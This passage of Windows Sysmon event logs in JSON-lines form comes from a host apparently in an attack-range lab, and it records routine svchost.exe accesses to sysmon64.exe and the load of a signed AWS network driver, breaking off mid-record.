{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1473,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1474,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1475,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1476,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1477,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.353\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.353","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":1478,"ProcessID":2804,"ThreadID":3364,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:03.253\r\nImageLoaded: C:\\Windows\\System32\\drivers\\xenvif.sys\r\nHashes: MD5=159E9512AA64057D43A1BEDF4D3122E0,SHA256=1932630E63EBE989E884C4EE8FA6C0A9FC1C1638397D721995C23EF292BB5B23,IMPHASH=C119D28B8420C26CE25D996F6D25FD88\r\nSigned: true\r\nSignature: Amazon Web Services, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 07:53:03.253","ImageLoaded":"C:\\Windows\\System32\\drivers\\xenvif.sys","Hashes":"MD5=159E9512AA64057D43A1BEDF4D3122E0,SHA256=1932630E63EBE989E884C4EE8FA6C0A9FC1C1638397D721995C23EF292BB5B23,IMPHASH=C119D28B8420C26CE25D996F6D25FD88","Signed":"true","Signature":"Amazon Web Services, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1479,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.353\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.353","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1480,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.353\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.353","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1481,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.353\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 